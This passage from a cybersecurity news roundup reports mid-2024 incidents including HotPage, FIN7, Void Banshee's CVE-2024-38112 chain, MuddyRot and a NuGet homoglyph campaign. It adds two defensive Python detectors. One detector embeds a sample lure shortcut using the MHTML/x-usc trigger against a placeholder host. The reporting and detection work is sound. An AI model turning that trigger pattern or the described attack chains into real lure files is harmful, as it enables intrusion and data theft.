Advertised to Chinese-speaking users, the software claims to enhance web browsing by blocking ads and malicious sites. In reality, however, HotPage abuses its functions to display game-related ads and collect system information. At its core, researchers from ESET state, the malware uses a Microsoft-signed driver to inject code into processes running on the infected system. Along with this code injection, the malware installs two libraries designed to intercept and manipulate browser network traffic on affected systems. This allows the malware to modify web page content, redirect users, or even open new tabs based on predetermined conditions. The kernel-level access granted by the embedded driver opens up pathways for the deployment of additional malware payloads on victim systems. Through the exploitation of improper access restrictions, the malware potentially allows threat actors to execute code with the highest available privileges within the Windows operating system. Following the discovery of these vulnerabilities, the Microsoft Security Response Center (MSRC) was notified on March 18, 2024. By May 1, 2024, the driver was removed from the Windows Server Catalog, with researchers identifying the threats as Win{32|64}/HotPage.A and Win{32|64}/HotPage.B.

[Image] Source: welivesecurity.com

The Company Behind the Malware

The malware's developers had obtained an Extended Verification certificate from Microsoft for use in signing the HotPage driver. The company, Hubei Dunwang Network Technology Co., Ltd., had been established in January 2022 and is now owned by Wuhan Yishun Baishun Culture Media Co., Ltd., a small advertising firm. Despite claiming to offer security solutions, researchers believe the company's product contradicts its own license agreement. While the company stated that DwAdsafe lacked interception capabilities, the software actually includes intrusive monitoring and filtering functions.

[Image] Web-crawled screenshot of dwadsafe.com before shutdown (Source: welivesecurity.com)

The company's website, dwadsafe[.]com, is no longer accessible, but archived versions describe the product as an "Internet cafe active defense cloud platform." Researchers note conflicts between the company's license agreement and the software's actual purpose and capabilities. While masquerading as a helpful tool, HotPage poses significant risks to user privacy and system security. Its signed driver and deceptive marketing demonstrate a disturbing trend where malware programs are presented as legitimate software with well-intentioned purposes. The campaign underscores the critical need for thorough vetting processes for driver signing as threat actors attempt to exploit trust in legitimate software channels.

Cisco SSM On-Prem Addresses Critical Vulnerability That Allowed Attackers to Change User Passwords

By: Alan J
18 July 2024 at 13:38


Cisco has issued a critical security advisory for a vulnerability in its Cisco Smart Software Manager On-Prem licensing tool, which could allow attackers to change any user's password, including those of administrators on license servers. The flaw, tracked as CVE-2024-20419, affects SSM On-Prem installations earlier than Release version 7.0, also known as Cisco Smart Software Manager Satellite (SSM Satellite).

Cisco Smart Software Manager On-Prem Vulnerability

The vulnerability has been rated at the maximum severity score of 10.0 on the CVSS scale, and stems from an improper implementation of the password-change process in SSM On-Prem's licensing authentication system.

[Image] Source: sec.cloudapps.cisco.com

The National Vulnerability Database provides the following description of the vulnerability:
"A vulnerability in the authentication system of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an unauthenticated, remote attacker to change the password of any user, including administrative users. This vulnerability is due to improper implementation of the password-change process. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device."
As a Cisco Smart Licensing component, SSM On-Prem plays a crucial role in managing customer accounts and product licenses for service providers and Cisco partners. Successful exploitation of this flaw enables attackers to send crafted HTTP requests and gain access to the web UI or API with all the privileges associated with compromised user accounts.

SSM On-Prem Disclosure and Official Patch

Cisco acknowledged the disclosure of the vulnerability and expressed appreciation for the efforts of Mohammed Adel, the researcher who reported it. Cisco has released software updates to address the vulnerability, and stated that there were no available workarounds. Cisco has advised customers with active service contracts to obtain the necessary security fixes through their regular update channels. Those without service contracts can contact the Cisco Technical Assistance Center (TAC) to obtain the required upgrades. Cisco's Product Security Incident Response Team (PSIRT) has not yet found evidence of public proof-of-concept (POC) exploits or active exploitation attempts targeting this vulnerability. However, the company urges customers to remain vigilant and regularly consult Cisco security advisories to stay informed about the latest threats and mitigation strategies.

[Image] Source: sec.cloudapps.cisco.com

The company has provided a clear roadmap for affected and fixed releases, as detailed in the advisory. Customers are strongly encouraged to upgrade to the appropriate fixed software release to secure their SSM On-Prem installations and protect against potential exploitation. Before upgrading, it is essential to ensure that the devices contain sufficient memory and to confirm that current hardware and software configurations will continue to be supported by the new release. Customers are advised to regularly consult advisories for Cisco products to determine exposure and a complete upgrade solution. The Cisco Support and Downloads page on Cisco.com provides information about licensing and downloads.

Japanese Real Estate Firm SUUMO Confirms Data Breach Incident

By: Alan J
17 July 2024 at 20:09


Recruit Co., Ltd., a prominent Tokyo-based company, recently announced that a data breach had affected its real estate wing SUUMO and had compromised sensitive data belonging to several of its employees. The incident, discovered on July 9, involved unauthorized access to a server used to test some of its real estate services. The company says no user or customer information was compromised, and no secondary damage has been reported. However, the breach exposed personal data records of 1,313 current and former employees going as far back as 2007. The firm has also come under increased scrutiny recently over its collection of student data as well as its outsourcing to foreign nations.

Recruit Co Ltd Response and Preventive Measures

On July 9, SUUMO, the real estate branch of Recruit, detected unauthorized access by a third party to the server of a service provided to real estate companies, which was being tested before deployment in some areas.

[Image] Source: suumo.jp

Although the affected system was shut down, it was discovered that some of the data on it relating to employees had been compromised. Recruit expressed regret for the inconvenience and concern stemming from the incident. Recruit took several actions to limit the impact of the breach, including:
  • Contacting affected employees individually
  • Setting up a hotline for inquiries
  • Implementing measures against unauthorized access
  • Rebuilding and re-inspecting affected servers
  • Strengthening overall security measures
The statement on its website, issued from the head office in Chiyoda-ku, Tokyo by President and CEO Yoshihiro Kitamura, announced that data related to 1,313 employees and contractors involved in the development and maintenance of its housing-related services since 2007 had been compromised. "We would like to report the following and offer our deepest apologies for the considerable inconvenience and concern caused to all concerned parties," the statement expressed. "In addition, no leaks of user or customer information have been confirmed in this incident. As of today, no secondary damage caused by the use of employee information has been confirmed," it added.

Concerns Over Student Data Management and Outsourcing

In a separate recent development, Recruit Co. came under intense scrutiny for its handling of public school students' personal data. While the company had been authorized by some local governments to collect and manage student information to provide various educational apps, other local governments reported that they had not been fully aware of the data collection practices. These concerns were raised further as it came to light that Recruit had allegedly shared some of this data with foreign businesses to improve other commercial apps. A Yomiuri Shimbun survey found that at least 14 local governments have introduced Recruit's apps this fiscal year, and about 85,000 elementary and junior high school students use the apps. Some of the local governments were unaware of the overseas outsourcing and other improper management of students' personal data. The education ministry announced plans to investigate the situation nationwide, after suspecting mismanagement of student data by local governments and the firm. The ministry emphasized the importance of local governments taking proper initiative while collecting and managing students' data, and requires them to supervise app providers and exercise caution when storing data overseas.

23andMe Reaches Settlement in Data Breach Class Actions Lawsuit

By: Alan J
17 July 2024 at 16:33


Genetic testing company 23andMe has reached a settlement in principle for class actions stemming from a 2023 data breach, lawyers announced during a San Francisco court hearing on Tuesday. The breach compromised the personal information of nearly 7 million users, including sensitive genetic profiles. While the settlement details remain undisclosed, U.S. District Judge Edward Chen of the Northern District of California scheduled a July 30 hearing to review the status of the term sheet. A motion for preliminary approval is expected within 30 to 45 days.

23andMe Settlement Negotiations and Terms

[Image] Source: blog.23andme.com

Co-lead plaintiffs' counsel Cari Laufenberg of Keller Rohrback told Judge Chen that the parties accepted a proposal from mediator Randall Wulff following a June 26 meeting. The agreement in principle comes after a swift resolution process, with some plaintiffs' lawyers initially disagreeing in early settlement talks. Earlier in January, some plaintiffs' counsels met with 23andMe representatives to discuss settlement, but disagreements over the best approach for breach victims led to a battle over leadership of the cases. U.S. District Judge Edward Chen of the Northern District of California intervened last month, appointing co-lead counsels to oversee the cases. At a hearing last month, lawyers expressed concerns that 23andMe was in imminent danger of filing for bankruptcy, suggesting that injunctive relief, including a fund to compensate class members for psychological or physical harm, would be a key focus of any settlement. The settlement is expected to encompass the multidistrict litigation, state court cases, and thousands of arbitration demands. While specific terms are not yet public, previous discussions suggested a potential 'steep discount' in monetary relief for class members in a case that faced up to $3 billion in damages under the Illinois Genetic Information Privacy Act. The terms of the settlement may include injunctive relief from 23andMe (a requirement that a party act in a certain way) and the provision of options such as dark web monitoring to victims.

Financial Implications and Company Response

[Image] Source: 23andme.com

23andMe's annual report revealed $216 million in cash, which could impact the settlement amount. The company's attorney, Ian Ballon of Greenberg Traurig, expressed a focus on settlement and approval moving forward. A 23andMe spokesperson stated that the agreement is "in the best interest of 23andMe customers," and the company looks forward to finalizing the settlement. This resolution comes as a relief to the company, which faced potential bankruptcy concerns raised by lawyers during previous hearings. The settlement marks a significant step in addressing the fallout from the data breach, relieving some fears that had been stoked earlier after the genetic information of specific ethnic groups had been compromised. One such dataset had been advertised earlier on a hacking forum as a list of Ashkenazi Jews, while another had been described as a list of people of Chinese descent. As the case progresses, the final terms of the settlement will provide insight into how 23andMe plans to compensate affected users and improve its data security measures.

FIN7 Cybercriminal Gang Adopts Techniques to Elude EDR and Automate Attacks

By: Alan J
17 July 2024 at 15:51


FIN7, a financially motivated threat actor group with origins in Russia, has shown a persistent determination to evolve and adapt its tactics despite setbacks and arrests, utilizing multiple pseudonyms to mask its true identity and sustain its criminal operations. The group, which has been active since 2012, initially focused on point-of-sale malware for financial fraud, but shifted to ransomware operations in 2020, affiliating with well-known ransomware-as-a-service groups and launching its own independent programs.

FIN7 Underground Operations

New research from SentinelOne has uncovered FIN7's recent activities in underground criminal forums, where the group markets its tools and services under various fake aliases. Of these tools, the group has most prominently been selling a highly specialized tool labelled AvNeutralizer (also known as AuKill) that is designed to disable most security solutions.

[Image] Source: sentinelone.com

Advertisements for the AvNeutralizer tool appeared on multiple forums under various usernames, at prices ranging from $4,000 to $15,000. Researchers state that the tool's widespread adoption by various ransomware groups suggests it is no longer exclusive to a single threat actor's operations. Researchers identified several usernames – including "goodsoft," "lefroggy," "killerAV" and "Stupor" – that suggested association with the FIN7 cybercriminal group in promoting its tools and services, such as a post-exploitation framework labelled "PentestSoftware."

[Image] Source: sentinelone.com

The group's use of multiple identities across different forums appears to be a strategy to mask its true identity while maintaining its illicit operations.

FIN7 Arsenal Used in Operations

The FIN7 cybercriminal group's success in executing sophisticated cyberattack operations relies on a versatile toolkit that includes:
  • Powertrash: A heavily obfuscated PowerShell script used to reflectively load malware in memory, evading detection.
  • Diceloader: A minimal backdoor allowing attackers to establish command and control channels and load additional modules.
  • SSH-based backdoor: A persistence mechanism using OpenSSH and 7zip to maintain access to compromised systems.
  • Core Impact: A commercial penetration testing tool repurposed for malicious activities.
  • AvNeutralizer: A specialized tool for disabling security solutions.
Analysis of Powertrash samples revealed a timeline of FIN7's malware evolution, showing a transition from Carbanak to Diceloader (also known as Lizar) in early 2021. The group has also incorporated the Core Impact pentesting tool into its arsenal, in correlation with observed underground forum activity where FIN7-associated accounts actively sought cracked copies of the software. FIN7's infrastructure includes command and control servers for Diceloader, which researchers have tracked across various countries and hosting providers. In one instance, an exposed server revealed the group's use of an SSH-based backdoor for stealthy file exfiltration. The group's adoption of commercial tools like Core Impact demonstrates its commitment to using sophisticated, hard-to-detect methods for compromising target networks. The new research sheds light on FIN7's persistent adaptability and ongoing evolution in its operations, which include the adoption of automated attack methods such as targeting public-facing servers through automated SQL injection attacks. Additionally, the group's development and sale of specialized, independently developed tools such as AvNeutralizer in various criminal underground forums bolster the group's impact and influence among other cybercriminals while demonstrating its technical expertise. FIN7's use of multiple identities and active collaboration with other threat actor groups makes it much more challenging for researchers to attribute its operations. The researchers said they hope the research will inspire more efforts to understand and protect against FIN7's continually evolving attack tactics.

Void Banshee Targets Victims Through Use of 'Zombie' Internet Explorer Zero-Day

By: Alan J
16 July 2024 at 20:07


Researchers have uncovered a critical vulnerability (CVE-2024-38112) that the Void Banshee threat actor group has been actively exploiting in a recent campaign to deploy the Atlantida info-stealer through a disabled version of Internet Explorer. The campaign highlights the security risks introduced by the maintenance of legacy software on modern systems.

Anatomy of Void Banshee Attack-Chain

The Void Banshee group lures victims by disguising malicious files as e-books and sharing them through cloud services, Discord servers and online libraries. When a user opens one of these files – typically a zip archive masquerading as a PDF and containing malicious shortcut files – they trigger a chain of events that ultimately installs the Atlantida stealer.

[Image] Source: trendmicro.com

Researchers from Trend Micro stated that the attack chain begins with a spear-phishing email containing a zip archive with a malicious file disguised as a PDF. The file, named "Books_A0UJKO.pdf.url", uses the MHTML protocol handler and the x-usc! directive to exploit the CVE-2024-38112 vulnerability. This allows the attacker to access and execute files through the disabled IE process. The malicious file downloads an HTML file, which in turn downloads an HTA file containing a Visual Basic Script (VBScript) that decrypts and executes a PowerShell script.

[Image] Legacy Internet Explorer version on modern systems (Source: trendmicro.com)

The PowerShell script downloads an additional script from a compromised web server and executes it, creating a new process for the downloaded script. This script is designed to download and execute a PowerShell trojan, which can be used to compromise the victim's system. The campaign ultimately exploits the vulnerability in the MHTML protocol handler to access and run files through the system's built-in, disabled instance of Internet Explorer. This technique bypasses normal security controls and allows the attackers to directly execute the Atlantida info-stealer malware on the victim's system.
The researchers note that Atlantida is based on previous open-source stealers such as NecroStealer and PredatorTheStealer, and is designed with many of the same capabilities. It targets sensitive information from various applications, including Telegram, Steam, FileZilla, cryptocurrency wallets and web browsers such as Chrome and Microsoft Edge, to exfiltrate sensitive and important data such as passwords and cookies. The malware allows attackers to capture victims' screens and exfiltrate information from cryptocurrency-associated browser extensions, registering each extension with a unique 'Extension ID.' Data exfiltrated from the attack is compressed within a ZIP archive file and transmitted via TCP.
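As an added defensive example (not code from Trend Micro or from the article), the following Python triage script checks Windows Internet Shortcut files for the lure pattern described above: a document-style name stacked in front of .url, and a shortcut target that goes through the MHTML protocol handler with the x-usc directive. It assumes that .url files are INI-style text with an [InternetShortcut] section and a URL= key; the sample files and the hosts in them are constructed placeholders, not real indicators.

```python
"""Triage Windows Internet Shortcut (.url) files for the lure pattern used by
Void Banshee for CVE-2024-38112: a document-looking name ending in .url whose
target goes through the MHTML protocol handler with the x-usc directive.

Assumptions (not from the article): .url files are INI-style text with an
[InternetShortcut] section and a URL= key; the samples below are constructed
and point at placeholder hosts.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Document extensions a lure typically stacks in front of .url
DOCUMENT_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".epub", ".txt")

MHTML_SCHEME = re.compile(r"^mhtml:", re.IGNORECASE)
X_USC_DIRECTIVE = re.compile(r"x-usc", re.IGNORECASE)


@dataclass
class Verdict:
    path: str
    findings: list[tuple[str, str]] = field(default_factory=list)  # (tag, detail)

    @property
    def tags(self) -> list[str]:
        return [tag for tag, _ in self.findings]

    @property
    def suspicious(self) -> bool:
        # The MHTML handler or the x-usc directive in a shortcut target is the
        # strong signal; a double extension on its own is only a weak one.
        return bool({"mhtml", "x-usc"} & set(self.tags))


def parse_url_file(text: str) -> dict[str, str]:
    """Minimal reader for the [InternetShortcut] section of a .url file.

    Tolerates a UTF-8 BOM, CRLF line endings and duplicate keys (last one
    wins), which configparser in strict mode would reject.
    """
    values: dict[str, str] = {}
    section = None
    for raw in text.lstrip("\ufeff").splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "internetshortcut" and "=" in line:
            key, _, value = line.partition("=")
            values[key.strip().lower()] = value.strip()
    return values


def triage_url_file(path: str, text: str) -> Verdict:
    """Return a Verdict for one .url file given its path and text content."""
    verdict = Verdict(path)
    name = re.split(r"[\\/]", path)[-1].lower()
    if name.endswith(".url"):
        stem = name[: -len(".url")]
        for ext in DOCUMENT_EXTS:
            if stem.endswith(ext):
                verdict.findings.append(
                    ("double-extension", f"named like a {ext} document but is a .url shortcut"))
                break
    target = parse_url_file(text).get("url", "")
    if MHTML_SCHEME.search(target):
        verdict.findings.append(("mhtml", "target uses the MHTML protocol handler"))
    if X_USC_DIRECTIVE.search(target):
        verdict.findings.append(("x-usc", "target carries the x-usc directive"))
    return verdict


# Constructed samples: placeholder hosts, not real indicators.
LURE_SAMPLE = (
    "[InternetShortcut]\r\n"
    "URL=mhtml:http://lure.invalid/Books.html!x-usc:http://lure.invalid/Books.html\r\n"
    "IconIndex=0\r\n"
)
BENIGN_SAMPLE = "[InternetShortcut]\r\nURL=https://docs.example.invalid/Books.pdf\r\n"

if __name__ == "__main__":
    for fname, body in (("Books_A0UJKO.pdf.url", LURE_SAMPLE), ("notes.url", BENIGN_SAMPLE)):
        v = triage_url_file(fname, body)
        print(fname, "SUSPICIOUS" if v.suspicious else "clean", v.findings)
```

Run over an archive's extracted contents, a hit on the mhtml or x-usc tag is worth an alert even if the attachment passed signature-based scanning, since the shortcut itself carries no payload.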

Microsoft Patched Vulnerability

The researchers disclosed the vulnerability to Microsoft, which patched the vulnerability in its July 2024 update cycle, unregistering the MHTML handler from Internet Explorer. However, experts warn that many systems may remain unpatched and vulnerable. To protect against this and similar attacks, security professionals recommend:
  • Promptly applying all available Windows security updates
  • Implementing robust email filtering to block malicious attachments
  • Educating users about the dangers of opening suspicious files or links
  • Deploying endpoint protection software capable of detecting and blocking such attacks
As cybercriminals continue to exploit overlooked vulnerabilities in legacy systems, the discovery of CVE-2024-38112 serves as a stark reminder of the importance of comprehensive security measures and timely patching.

Iranian Group MuddyWater Deploys MuddyRot Malware in New Campaign

By: Alan J
16 July 2024 at 16:57


MuddyWater, a notorious threat actor group linked to the Iranian intelligence service, has been operating a new malware campaign that targeted several Western and Middle Eastern entities. The malware, dubbed "MuddyRot," is a backdoor implant developed in C with a wide range of capabilities and was used primarily to attack various countries in the Middle East, such as Turkey, Azerbaijan, Jordan, Saudi Arabia, and Israel.

MuddyRot Malware

Researchers from Sekoia observed that the new MuddyRot malware is distributed through malicious PDF files and relies on public exploits to compromise internet-exposed servers, such as Exchange or SharePoint servers, moving laterally within the entire network after successful compromise. After this stage, the threat actors sent spear phishing emails from compromised email accounts to bypass security measures and increase the appearance of legitimacy in the recipient's eyes.
[Image: MuddyRot MuddyWater malware (Source: blog.sekoia.io)]
MuddyRot is a sophisticated malware that uses a combination of obfuscation and encryption to evade detection by security tools. Upon execution, the malware de-obfuscates strings, loads the functions it needs, and creates a mutex (a lock that prevents a second instance of the program from running at the same time) to establish exclusive control over the program. It also uses dynamic import loading to reduce its potential digital footprint.
[Image: Iranian Group MuddyWater MuddyRot Malware (Source: blog.sekoia.io)]
The malware establishes persistence on the infected host by creating a scheduled task and copying itself to a system directory. It then communicates with its command and control (C2) server over a raw TCP socket. The MuddyRot malware supports various commands, including file upload and download, reverse shell, and process kill. The reverse shell capability allows the operator to connect to the victim host and execute commands remotely, capturing the results in real time. The malware's C2 communication is obfuscated: incoming input is decoded by subtracting a fixed value, and three bytes are added to the output. The developer of this backdoor added a "terminate" command to stop the reverse shell.
The MuddyRot backdoor implant is capable of executing the following commands:
[Image: Iranian MuddyWater MuddyRot Malware command table (Source: blog.sekoia.io)]
These commands are communicated with C2 servers over TCP port 443, along with further obfuscation to avoid detection.

Shifting Tactics

The MuddyWater group altered its infection strategy from relying on off-the-shelf remote monitoring software such as Atera and SimpleHelp to the custom-built MuddyRot implant. While the exact reasons for this switch are unknown, the researchers speculate that the change could be due to the increased scrutiny of these tools by security vendors, with the attackers possibly running into difficulties when deploying the Atera tool on targets. These difficulties may have prompted the group to switch to something more custom. The researchers note the departure in the MuddyWater group's recent campaigns from its traditional infection chain to the use of well-known exploits and the distribution of spear phishing emails with PDF files embedded with links that load the MuddyRot validator. This new tactic allows the malware to evade detection and increases its chances of successful infection. The researchers have shared potential indicators of compromise (IOCs) on GitHub to help protect against MuddyRot's deployment. Other cybersecurity firms such as Check Point and ClearSky recently conducted their own investigations into the new malware campaign from the Iranian threat actor.

Philippine Department of Migrant Workers Switches to Manual Systems After Cyber Attack

By: Alan J
16 July 2024 at 13:30

Philippine Department of Migrant Workers

The Philippine Department of Migrant Workers (DMW) has taken swift action to protect the personal data of overseas Filipino workers (OFWs) after a ransomware attack prompted the agency to shut down its online systems. While the attack may have caused inconvenience, the DMW has activated new protocols to cater to the daily transaction needs of OFWs to ensure that their information remains safe and secure.

Manual Processing at Department of Migrant Workers Offices

In a statement on Tuesday, the DMW said OFW data remains secure despite the cyber incident. The agency took its Management Information Technology System offline as a precautionary measure to protect worker information. To minimize disruption from the attack, the DMW activated manual processing of Overseas Employment Certificates and OFW passes at its national and regional offices, one-stop shops, and Migrant Workers Assistance Centers. The DMW stated, “As a result of a ransomware attack on DMW online systems, the Department through its Management Information Technology System had to take pre-emptive measures to protect OFW data and information, such as taking the systems offline.” OFWs can visit these locations to obtain necessary documents while online systems are unavailable. The DMW has also established an email-based system for OFWs requiring access to information sheets. Rather than physically visiting DMW offices, workers can send requests to infosheet@dmw.gov.ph. The agency will then email QR-coded information sheets directly to the requesting OFW. Alternatively, OFWs can submit requests via the DMW's Facebook page Messenger. By taking these measures, the DMW said it is ensuring that OFWs can continue to access the services they need while it works to restore its systems online. The agency is also coordinating with the Bureau of Immigration and airport authorities to facilitate the smooth departure of OFWs. The DMW has apologized for any inconvenience caused by the attack and is working to restore its online systems and implement stronger measures to protect the information of OFWs. In a statement on social media, the DMW said, "Rest assured, DMW databases containing OFW data were not affected by the attack, and that the DMW is currently working with the Department of Information and Communications Technology to restore online systems and ensure continued protection of the data and information of OFWs."

Philippines Cyber Attacks

The Philippines has observed an increased number of cyber attacks in recent times, prompting calls for increased government measures to strengthen the nation's digital infrastructure and reduce such campaigns. A recent bill, House Bill 8199, would direct the Department of Information and Communications Technology to bolster the Philippine National Cyber Security Plan, or NCSP. Rep. Brian Raymund Yamsuan pushed for approval of the bill within the House of Representatives earlier this year. He stated, “This measure complements the NCSP and is a good jump-off point in accomplishing one of its primary objectives, which is to ensure convergence among all government agencies in protecting our country from cyber attacks.” Yamsuan offered support for reports that Philippine President Marcos, U.S. President Joe Biden and Japanese Prime Minister Fumio Kishida were establishing joint plans for a cyber defense framework during an earlier trilateral summit. Several government agencies have also discussed measures to bolster their cybersecurity capabilities, including a unified system for setting minimum security standards, monitoring of systems, and detection and mitigation of threats.

Indian Authorities Allege Massive Trafficking Scheme in Chinese Controlled Scam Centers

By: Alan J
14 July 2024 at 08:08

Chinese Scam Centers

The Central Bureau of Investigation (CBI) of India has uncovered a large-scale human trafficking operation that has ensnared thousands of Indians in Southeast Asian countries to work in Chinese scam centers. According to a first information report (FIR) filed by the agency, victims are being forced to work as cyber criminals in these operations. Rajesh Kumar, CEO of the Indian Cyber Crime Coordination Centre, revealed that an average of 7,000 cyber-related complaints are registered daily with the National Cybercrime Reporting Portal. Most of these frauds originate in Cambodia, Myanmar and Laos.

Trafficking Scheme of Chinese Scam Centers

According to a recent report from The Indian Express, victims of these campaigns are lured in with promises of lucrative jobs in foreign countries such as Dubai and Bangkok, only to be trafficked to Southeast Asian countries. Once they arrive, they are forced to work in call centers or "casinos" where they are trained to scam people from around the world. One such victim, Saddam Sheikh from Maharashtra's Palghar district, was contacted via WhatsApp about a job opportunity in Thailand. After paying 140,000 rupees (approximately $1,700) for a visa, Sheikh was sent to Bangkok and then to Laos. He was forced to scam people in India, Canada and the United States by promoting fraudulent cryptocurrency investments online. Sheikh eventually managed to escape and return to India. Similar cases have been reported in other parts of Southeast Asia. Martha Praveen, who fled a scam operation in Cambodia, claimed he was among 5,000 Indians working in a call center run by Chinese gangs. Praveen was initially offered a job in Azerbaijan but was instead sent to Cambodia. Upon arrival, his passport was confiscated, and he was taken to a large office complex housing multiple call centers disguised as casinos.

Government Response and Investigation

The CBI filed its case after consulting with the home ministry, telecom ministry and Reserve Bank of India. These institutions were tasked with identifying and addressing vulnerabilities in the banking and telecom sectors that enable such scams. The Telangana Cyber Security Bureau has also filed a similar report based on Praveen's complaint. The victims were reportedly involved in scamming people by offering fraudulent trading, investment and job opportunities, primarily targeting Indians, Europeans and Turkish nationals. As investigations continue, authorities are working to dismantle these criminal networks and prevent further exploitation of Indian citizens. The scale of the operation highlights the need for increased vigilance and cooperation between international law enforcement agencies to combat human trafficking and cyber crime.

Homoglyphs and IL Weaving Used To Evade Detection in Malicious NuGet Campaign

By: Alan J
14 July 2024 at 05:46

Malicious NuGet Campaign

A sophisticated malware campaign targeting the NuGet package manager has been uncovered by researchers. The ongoing attack, which began in August 2023, has evolved to employ advanced techniques like homoglyphs and IL weaving to evade detection and fool developers. NuGet is the Microsoft-supported mechanism for sharing code, allowing developers to create, share, and consume .NET (including .NET Core) code. The threat actors have refined their methods over time, moving from simple initialization scripts to more complex approaches: impersonating protected NuGet prefixes and injecting malicious code into legitimate .NET binaries.

Homoglyph Attacks Bypass Security Measures

Researchers from ReversingLabs observed that, in a clever twist, attackers exploited NuGet's support for homoglyphs to circumvent the platform's prefix reservation system. By using visually identical but technically distinct characters, they created package names that appeared legitimate but weren't subject to the usual restrictions.
[Image: Malicious NuGet Campaign (Source: www.reversinglabs.com)]
One of the most notable techniques used in this campaign is the use of homoglyphs, characters that look identical but have different code points. The attackers used homoglyphs to create packages that convincingly mimic those using the reserved "Guna" prefix, a security feature of NuGet. For example, the malicious package "Gսոa.UI3.Wіnfօrms" used Armenian and Cyrillic characters to mimic the "Guna" prefix, allowing the attackers to publish packages that looked official but contained malicious code. The campaign's latest phase employs IL weaving, a technique that modifies compiled .NET binaries. Attackers patch legitimate DLL files to include malicious module initializers, which execute when the module is first loaded. This approach makes detection more challenging, as the malicious code is embedded within otherwise legitimate binaries. The injected code typically functions as a downloader, retrieving additional malware from attacker-controlled servers.
[Image: Homoglyphs and IL Weaving NuGet Campaign (Source: www.reversinglabs.com)]
Researchers identified approximately 60 packages and 290 versions involved in this campaign. While the affected packages have been removed from NuGet, the evolving nature of the attack underscores the need for heightened vigilance in the software supply chain.

Evolved Tactics

The threat actors behind this campaign have continually refined their tactics, evolving from exploiting NuGet's MSBuild integrations to using simple, obfuscated downloaders inserted into legitimate PE binary files via IL weaving. This technique allows them to add malicious functionality to compiled .NET binaries, making it harder to detect. The detection of these malicious packages is challenging due to the use of homoglyphs and IL weaving. Traditional detection methods, such as YARA, may not be effective in identifying these threats. However, behavioral analysis can help identify suspicious packages and indicators of compromise. This latest campaign highlights the importance of staying ahead of malicious actors and their evolving tactics. The use of homoglyphs and IL weaving demonstrates the creativity and determination of attackers to deceive developers and security teams. It is crucial for development organizations to prioritize software supply chain security and stay informed about emerging threats. Researchers have shared potential Indicators of Compromise (IOCs) for this campaign to NuGet administrators, with identified packages removed from the platform. It is essential for developers to remain vigilant and report any suspicious packages to ensure the security of the software supply chain.
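As an added example (not ReversingLabs' or NuGet's own code), the following Python checker folds the Armenian and Cyrillic lookalikes in a package ID back to Latin and compares the result against reserved prefixes, which catches the "Guna" impersonation described above and flags mixed-script IDs generally. The reserved-prefix list and the lookalike table are constructed for this example and cover only a handful of characters.

```python
import unicodedata
from dataclasses import dataclass, field
from typing import List, Optional, Set, Tuple

# Reserved ID prefixes to protect. Constructed list for this example; "Guna"
# is the prefix the campaign impersonated.
RESERVED_PREFIXES = ("Guna", "Microsoft")

# Lookalike table, constructed for this example (a tiny subset of Unicode's
# confusables data). It covers the four non-Latin letters in the reported
# package ID plus a few Cyrillic letters commonly used the same way.
LOOKALIKES = {
    "\u057d": "u",  # ARMENIAN SMALL LETTER SEH
    "\u0578": "n",  # ARMENIAN SMALL LETTER VO
    "\u0585": "o",  # ARMENIAN SMALL LETTER OH
    "\u0456": "i",  # CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I
    "\u0430": "a",  # CYRILLIC SMALL LETTER A
    "\u0435": "e",  # CYRILLIC SMALL LETTER IE
    "\u043e": "o",  # CYRILLIC SMALL LETTER O
    "\u0440": "p",  # CYRILLIC SMALL LETTER ER
    "\u0441": "c",  # CYRILLIC SMALL LETTER ES
}


@dataclass
class Report:
    package_id: str
    skeleton: str                 # ID with lookalikes folded to Latin, lowercased
    scripts: Set[str] = field(default_factory=set)
    lookalikes: List[Tuple[int, str, str, str]] = field(default_factory=list)
    impersonated_prefix: Optional[str] = None
    verdict: str = "ok"           # ok | suspicious | reserved-prefix | impersonation


def script_of(ch: str) -> str:
    """Approximate a letter's script from the first word of its Unicode name."""
    name = unicodedata.name(ch, "")
    return name.split(" ", 1)[0] if name else "UNKNOWN"


def analyze(package_id: str) -> Report:
    normalized = unicodedata.normalize("NFKC", package_id)
    scripts: Set[str] = set()
    lookalikes = []
    skeleton_chars = []
    for index, ch in enumerate(normalized):
        if ch.isalpha():
            scripts.add(script_of(ch))
        latin = LOOKALIKES.get(ch)
        if latin is None:
            skeleton_chars.append(ch)
        else:
            lookalikes.append((index, ch, unicodedata.name(ch, "?"), latin))
            skeleton_chars.append(latin)
    skeleton = "".join(skeleton_chars).lower()
    report = Report(package_id, skeleton, scripts, lookalikes)

    for prefix in RESERVED_PREFIXES:
        wanted = prefix.lower() + "."
        if normalized.lower().startswith(wanted):
            # Literal match: only the prefix owner may publish here, which
            # NuGet's reservation system already enforces.
            report.verdict = "reserved-prefix"
            return report
        if skeleton.startswith(wanted):
            # Matches the reserved prefix only after folding lookalikes:
            # the homoglyph trick the campaign used.
            report.impersonated_prefix = prefix
            report.verdict = "impersonation"
            return report

    if lookalikes or len(scripts) > 1:
        report.verdict = "suspicious"
    return report


if __name__ == "__main__":
    samples = [
        "G\u057d\u0578a.UI3.W\u0456nf\u0585rms",  # the ID named in the report
        "Guna.UI2.WinForms",                     # constructed: literal reserved prefix
        "M\u0456crosoft.Extensions.Logging",     # constructed: Cyrillic i
        "Acme.Utilities",                        # constructed: plain ASCII
    ]
    for pid in samples:
        r = analyze(pid)
        print(f"{r.verdict:15} {pid!r:40} skeleton={r.skeleton} scripts={sorted(r.scripts)}")
        for index, ch, name, latin in r.lookalikes:
            print(f"    position {index}: {ch!r} ({name}) looks like {latin!r}")
```

A real deployment would use the full Unicode confusables data and run the check as a publish-time gate in the registry rather than on the client.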

Malvertising Campaign Lures Mac Users with Fake Microsoft Teams Ad

By: Alan J
13 July 2024 at 09:09

macOS Ad Campaign Microsoft Teams malware

A sophisticated malvertising campaign is targeting Mac users searching for Microsoft Teams, highlighting the growing competition among malware creators in the macOS ecosystem. This latest attack, which uses the Atomic Stealer malware and follows closely on the heels of the Poseidon (OSX.RodStealer) project, indicates growing advancements in threats affecting macOS.

Deceptive Microsoft Teams for macOS Ad Campaign

